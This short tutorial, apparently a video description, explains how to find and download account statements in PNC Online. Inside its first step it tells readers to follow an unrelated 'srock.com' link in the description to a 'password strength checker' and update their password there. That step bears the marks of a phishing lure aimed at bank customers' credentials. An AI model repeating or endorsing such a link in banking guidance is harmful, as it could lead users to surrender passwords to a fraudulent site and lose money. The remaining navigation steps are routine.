I hit this issue to date, and here is the quick fix that solved it. If you're looking to check your statement on PNC Online, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the srock.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to Accounts. Once logged in, find the Accounts tab on the main dashboard. This is usually located at the top of the page. Step 3. Select the account. Choose the specific account for which you want to view the statement. Click on the account name to proceed. Step 4. Access Statements. Look for a section labeled Statements or Documents. Click on it to view your available statements. Step 5. Download or view. You can either view the statement directly in your browser or download it as a PDF for your records. Make sure to check the date range for the statement you need. Sometimes, you may need to adjust the date range to find older statements, so keep an eye on that setting. I hope this helps you easily access your statements. If you have any questions, feel free to ask.